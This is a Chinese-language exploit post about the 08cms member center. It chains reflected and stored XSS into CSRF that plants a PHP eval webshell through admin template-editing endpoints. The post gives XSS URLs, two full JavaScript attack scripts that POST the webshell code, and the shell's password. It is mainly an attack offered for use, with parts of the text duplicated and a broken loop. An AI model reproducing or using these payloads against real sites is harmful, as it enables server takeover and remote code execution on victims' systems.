08cms会员中心xss+csrf可getshell

摘要

这个属于本站原创，很难看到的哦
首先是在搜索出存在反射性的跨站搜索处存在反射性xss
[php]

这个属于本站原创，很难看到的哦
首先是在搜索出存在反射性的跨站

搜索处存在反射性xss
[php]

http://0day5.com/search.php?caid=2&ccid1=208&chid=4&djfrom=1&djto=1prompt(968256)

http://0day5.com/search.php?caid=2&ccid1=208&chid=4&djfrom=1prompt(981700)&djto=1

http://0day5.com/search.php?caid=4&chid=2&mchid=1&zjfrom=1prompt(966559)&zjto=1

http://0day5.com/search.php?caid=4&chid=2&mchid=1&zjfrom=1&zjto=1prompt(922207)
[/php]

会员中心adminm.php?action=memberinfo

修改头像的时候发现可以外部调用，仅仅是检查了后缀，然后在附件的地方插入
[php]
http://0day5.com/">

adminc/images/logo_member.png[/php]
返回我的首页，发现成功的触发了xss

然后在后台测试，发现了两种不同的getshell的办法

针对3.0以前的附上js脚本，3.0以后的没条件测试。通过演示站目测的。不行就算了
[php]
function ajax(){
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
return request;
}
var _x = ajax();
postgo();
function postgo() {
src="/admina.php?entry=csstpls&action=filedetail&filename=0day5.php&jsmode=1&forward=";
data="contentnew=%3C%3Fphp+eval%28%24_POST%5B0day5%5D%29%3B+%3F%3E&bfiledetail=%CC%E1%BD%BB";
xhr_act("POST",src,data);
}
function xhr_act(_m,_s,_a){
_x.open(_m,_s,false);
if(_m=="POST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
_x.send(_a);
return _x.responseText;
}[/php]

针对3.0以后的在其他的地方
[php]
function ajax(){
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
return request;
}
var _x = ajax();
postgo();
function postgo() {
src="/admina.php?entry=sptpls&action=sptpldetail&spid=search";
data="contentnew=%3C%3Fphp+eval%28%24_POST%5B0day5%5D%29%3B+%3F%3E&bfiledetail=%CC%E1%BD%BB";
xhr_act("POST",src,data);
}
function xhr_act(_m,_s,_a){
_x.open(_m,_s,false);
if(_m=="POST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
_x.send(_a);
return _x.responseText;
}[/php]
成功后连接search.php 密码是0day5